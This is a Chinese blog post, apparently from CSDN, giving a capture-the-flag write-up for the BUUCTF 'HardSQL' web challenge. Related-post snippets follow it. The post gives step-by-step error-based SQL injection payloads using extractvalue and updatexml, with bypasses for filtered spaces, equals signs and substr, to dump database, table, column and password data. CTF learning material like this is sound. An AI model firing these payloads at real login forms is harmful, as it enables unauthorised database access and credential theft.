buuctf 极客大挑战 hardsql

最新推荐文章于 2024-07-30 17:12:16 发布
最新推荐文章于 2024-07-30 17:12:16 发布
阅读量3.9k 收藏 6
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/104041233
版权

在这里插入图片描述
常规sql注入发现成这样了。
然后发现order by 和 union 都不行
XPATH报错注入就可以用了
可以使用extractvalue和updatexml进行报错注入
输入的时候发现了
这题目还过滤了空格和and emmmm 用括号来代替空格就能绕过了
发现还不行
百度了web 的骚操作
用’^'来连接函数,形成异或
这边用的是extractvalue()

playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(database()))))%23

在这里插入图片描述

爆出当前库名

查询表名
playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables))))%23
在这里插入图片描述
然后试试查询geek库里的表
这个网址还过滤了等于号emmm,又是一个骚操作,用like代替‘=’
playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23在这里插入图片描述
ok,继续查
playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23
在这里插入图片描述
继续
playload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23
在这里插入图片描述
终于出来了一部分。。。。。。。
substr过滤了不能用
另外一个骚操作{left(),right()}

playload:username=44&password=1%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23
用left和right进行拼接就出来flag了

总结:
过滤空格注意括号的使用,然后就是报错注入常用的骚操作

penson by 小乌
关注
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客挑战 Hardsql
weixin_45751765的博客
08-30 696
0x00 前言 a.sql注入fuzzing 碰到sql注入题时,为尽快确认过滤列,可做一个fuzzing_test 注意一次发太多包会429,适当调节引擎 可以看到736都是被过滤的
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2064
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
极客挑战2019-hardsql
最新发布
lht2004的博客
07-30 480
报表名 1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#报数据 1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
[极客挑战 2019]HardSQL详细解析
sinat_61654365的博客
02-19 560
抓包看看都过滤了些什么?长度为784的为过滤字段,过滤了很多,例如空格,sleep,insert,--+,<>,and,等于号,by,union,/**/等等在测试引号的时候存在报错,有关函数updatexml()和extractvalue()所以尝试报错注入并且过滤了空格使用()闭合子查询绕过括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。本文使用updatexml()
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3076
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
非常经典的一道SQL报错注入题目[极客挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1592
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?...资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
[极客挑战 2019]HardSQL
qq_51902218的博客
08-24 538
目录 1.简单测试 2.报错注入 3. 爆库 4. 爆表 5. 爆列 6. 爆值 7. 拼接 1.简单测试 回顾之前的SQL,都是一种样式,肯定是原来的升级版,那就简单测试一下,输入and 1 = 1,order by......不论是发现都是一样的界面 2.报错注入 尝试用报错注入的方式试一试呗,反正不吃亏 一开始按照常理输入句子爆库,不行,发现应该是过滤掉一些关键字,但是具体过滤掉哪一些,本人还不太会使用工具,所以手工尝试,发现过滤了and、= 空格...
极客挑战2019】Hard SQL注入解题
Bird&Bird
10-26 1295
1、打开BUUCTF在线评测,选择web----->【极客挑战2019】HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
(超详细)[NISACTF 2022]hardsql——writeup
qq_74426248的博客
07-25 445
本文章为[NISACTF 2022]hardsql——writeup,欢迎各位师傅一起讨论!!!
web:[极客挑战 2019]HardSQL
sleepywin的博客
10-19 484
这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示。这里也是显示不全,按照上面的updatexml后的方法进行补全即可。这里空格和=没有,使用()代替空格,使用like代替=题目名为hardsql,先来尝试有无sql注入存在。查看源代码没有发现其他的提示信息,随便尝试一下。发现flag显示不全,函数显示有字符数限制。先查询数据库,构造payload。查询表,构造payload。查字段,构造payload。可得知数据库名为geek。
CTF-Web-[极客挑战 2019]HardSQL
归子莫的博客
05-03 2947
CTF-Web-[极客挑战 2019]HardSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]HardSQL 打开题目的实例 思路 SQl的题目,首先试一试...
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值